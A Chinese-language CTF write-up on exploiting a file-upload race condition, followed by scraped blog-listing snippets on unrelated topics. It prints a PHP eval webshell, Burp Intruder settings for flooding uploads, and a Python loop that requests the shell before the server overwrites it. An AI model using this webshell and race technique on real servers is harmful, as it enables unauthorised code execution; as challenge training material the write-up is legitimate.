moctf 没时间解释了 条件竞争漏洞

moctf 没时间解释了 条件竞争漏洞

题目链接

条件竞争:

在本题目中,上传文件的时候服务器无条件的接收任何类型的文件,但是你上传之后服务器会给你的文件内容修改为too slow。
比如你上传了一句话木马shell.php,内容<?php @eval($_POST['pass']);?>,可以直接上传,但是马上内容会被修改为too slow

方法:

修改内容会有时间,我们不断的上传这个文件并且不断的访问,会有一次我们正好访问到真正的shell.php

因为服务器修改内容是很快的,所以我们得用脚本开启多线程上传,不过也可以直接用burp intruder模块,线程调到20,然后python用requests模块
循环访问就可以了。


现在来看题目:

打开这个网页和好像什么也干不了,不过细心的话会发现,index2.php,默认的话应该访问index.php。

访问index.php,发现还是打开的index2.php,访问index没有提示404没错了是302。burp抓包拦截一下,repeater发包.

 访问  

发现可以直接上传   

 访问

提示Too slow!

猜测:

上传服务器后,服务器先保存然后判断文件,修改内容,就相当于把shell删除了。

思路:

我们一边是不停的发送这个文件,一边不停地访问。

发送:

最简单的方法是burp的intruder模块。
先进行拦截  

Send to Intruder  
Intruder->Positions->Clear$
Payloads->payload sets->payload type->Null payloads
Payloads->Payload options[Null payloads]->Continue indefinitely(持续发送)
Options->Number of threads(默认是5)调为20

上边做的是对intruder模块的设置,开启20个线程不断的发送上传文件的操作。

import requests
url="http://119.23.73.3:5006/web2/uploads/863213e3f631b8a5eb1e2ce6c0d7ea9d89b423c4/2.php"
while 1:
print(requests.get(url).text)

上边这个是不停的进行访问,其实这里不必开启多线程访问,因为上传文件和访问满足一个多线程就行了。

原文地址:https://www.cnblogs.com/zaqzzz/p/9923570.html

时间: 2024-10-04 22:39:20

moctf 没时间解释了 条件竞争漏洞的相关文章

条件竞争漏洞测试

概念: 竞争条件是系统中的一种反常现象,由于现代Linux系统中大量使用并发编程,对资源进行共享,如果产生错误的访问模式,便可能产生内存泄露,系统崩溃,数据破坏,甚至安全问题.竞争条件漏洞就是多个进程访问同一资源时产生的时间或者序列的冲突,并利用这个冲突来对系统进行攻击.一个看起来无害的程序如果被恶意攻击者利用,将发生竞争条件漏洞. 曾经出现过的漏洞: 网上大部分是使用转账的列子来说明的,曾经乌云提现环节就出现过这个漏洞,当时大神也是提现到账3000块,官方24小时紧急修复,承认提现有效.美滋滋

iOS多线程开发之NSOperation - 快上车,没时间解释了!

一.什么是NSOperation? NSOperation是苹果提供的一套多线程解决方案.实际上NSOperation是基于GCD更高一层的封装,但是比GCD更加的面向对象.代码可读性更高.可控性更强,很屌的是加入了操作依赖. 默认情况下,NSOperation单独使用时只能同步执行操作,并没有开辟新线程的能力,只有配合NSOperationQueue才能实现异步执行.讲到这里,我们不难发现GCD和NSOperation实现的方式很像,其实这更像是废话,NSOperation本身就是基于GCD的

浅析条件竞争

[原理] 竞争条件漏洞就是多个进程访问同一资源时产生的时间或者序列的冲突.Linux系统中大量使用并发编程,对资源进行共享,如果产生错误的访问模式,便可能产生内存泄露,系统崩溃,数据破坏等问题. 举一个小例子,下面这段代码定义了两个函数,不看get_flag正常情况下function是输出"NO permission!"但由于变量access是全局变量,在get_flag中被global了,于是在线程运行的过程中利用时间差,get_flag函数就可以改变access的初值,即改变了函数

你真的没时间吗? / Do You Have the Time?

你真的没时间吗? 在英文中,“你有时间吗”(Do You Have the Time?)有两种截然不同的含义. 第一种含义是“你知道现在几点吗?”虽然这种问法并不少见,但比起直接问“几点啦”(What time is it ?)用得还是比较少. 第二种含义是“你有时间(做某事)吗?”这种问法在美国英语.英国英语.澳洲英语中都十分常见. 假如我是<借口大辞海>(一本迄今为止还不存在的书)的编辑,我会认为“没时间”将成为历年“最常用借口”大奖的得主. 毕竟,用“没时间”做借口再方便不过. 回想一下

你真的没时间吗?

你真的没时间吗? 在英文中,“你有时间吗”(Do You Have the Time?)有两种截然不同的含义. 第一种含义是“你知道现在几点吗?”虽然这种问法并不少见,但比起直接问“几点啦”(What time is it ?)用得还是比较少. 第二种含义是“你有时间(做某事)吗?”这种问法在美国英语.英国英语.澳洲英语中都十分常见. 假如我是<借口大辞海>(一本迄今为止还不存在的书)的编辑,我会认为“没时间”将成为历年“最常用借口”大奖的得主. 毕竟,用“没时间”做借口再方便不过. 回想一下

【2019-12-29】面对悔恨,哪敢说没时间

08:00 “有一种东西不能遵循从众原则,那就是人的良心.” ——哈珀.李 我觉得人每天一定要为自己留有足够的独处思考时间,怎么留?我开始也觉得一天的时间就这么多,好像都安排得挺满的,想抽出一点时间来做点其它别的,确实好像真的要让自己伤筋动骨般痛苦,这就是人的一大弱点:不愿意改变.我习惯了这种工作节奏,也习惯了这样一种生活方式,想不到,习惯的双面作用差距非常庞大,在时间的这面放大镜下,连毛孔都能看得一清二楚.我昨天很自信地对自己说,每天多挤出一个小时写工作计划和总结,我必须有.我开始慢慢掌握了改

最近工作太忙,都没时间看过设计模式了

看完创建型,还有结构性,行为型没看,坚持抽时间看 一段时间专注一件核心的事就可以了,不然就会出现这个搞一点,那个搞一点,最后什么都没搞起来, 我现在出现的问题就是什么项目都想做,可惜现阶段资源有限,很多都无法面面俱到,有点乱, 有点浮躁了,年轻的时间就是在这种犹豫,交错的思绪中消磨,浪费,得坚持一个核心的道路, 其他一带而过.有时候不要活的太累.慢慢来.欲速则不达~

白岩松:没时间阅读才有时间抱怨

昨天,台湾名嘴陈文茜新书<树,不在了>在首都图书馆举行首发式,央视主持人白岩松助阵亮相,现场两人妙语连珠,畅谈全球经济.年轻人的成长等话题.有读者问白岩松如何在信息爆炸的时代筛选信息,白岩松表示“屏幕阅读”不等于真正意义的阅读,“我们现在只要无聊就掏出手机了,游戏.看新闻.跟人聊天,你很难有无聊的时光,但一些创意就是在发呆中诞生的.所以我还是建议大家减少点屏幕上的时间给书本,同时每天给自己一段放空和发呆的时光.” 谈经济 陈文茜年轻人不是非买房子不可 在华文天下推出的新书<树,不在了&g

没时间了解RPA和BPM?看这篇就够了

RPA和BPM这两个英文缩写单词,对企业或组织的业务流程优化有着至关重要的作用.企业要想在行业中获得核心竞争力,并更好地发展,绕不过他们这道"坎". RPA,Robotic Process Automation,机器人流程自动化BPM,Business Process Management,业务流程管理 到底怎么选择?哪种方法更好?这篇文章不会急着给您答案,因为任何武断的答案对您以及您的企业或组织都是不负责的.我们所做的,只是摆出一些事实. 什么是BPM?BPM(业务流程管理)是一套可